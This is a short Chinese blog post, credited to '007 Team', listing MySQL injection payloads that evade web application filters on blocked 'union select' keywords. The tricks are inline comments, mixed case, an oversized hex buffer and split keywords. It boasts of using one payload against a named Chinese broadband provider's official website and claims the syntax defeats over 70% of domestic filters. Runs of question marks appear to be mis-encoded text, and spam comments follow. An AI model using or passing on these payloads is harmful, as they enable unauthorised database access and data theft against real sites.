mysql 注射绕过语法

/ 7评 / 0 
id=-1+/*!uNioN*/+/*!SelEct*/+1,2,3,4--+
id=1/**/union/**/select/**/+1,2,3,4--+ 这个貌似没什么用。。
id=-1 and (select 1)=(select 0xAAA
AAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAA
AAAAAAA
AAAAAAAAAAAAAAAAAAAAAAA
AAA mores)+/*!union*/+/*!SeleCt*/
+1,2,3,4--+  应该是对特定的系统。。。 具体不怎么清楚
id=-1+concat(u,n,i,o,n)+concat(s,
e,l,e,c,t)+all+1,2,3,4--+  没测试过

id=-1+uni/**/on+Sel/**/Ect+1
,2,3,4--+

??????????????????????????????????

???????????????????????????????

?????????????????????????????????

????????????????????????????

?????????

r00t注释:

过滤union select的时候必备啊~ 这都看不懂 我也木办法了

用此语法绕过长城宽带官网

id=-1 and (select 1)=(select 
0xAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA mores)+/*!union*/+/*!Sele
Ct*/+1,2,3,4--+

 

此语法秒杀国内70%以上过滤~

???????????????????????????????????

????????????????

????????????????????????????????

?????????????????????

???????????????????????????????

fr0m:007 Team

《 “mysql 注射绕过语法” 》 有 7 条评论

« 先前评论
  1. drugrehabcentershotline.com drug rehab centers说道:
    2014年10月7日 下午3:54

    Very Nice Website…

    I enjoyed reading your articles…

    回复
  2. direct new payday loans lender说道:
    2014年10月5日 上午7:14

    Payday Loan Companies No Credit Check…

    No Fee Payday Loans…

    回复
« 先前评论

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注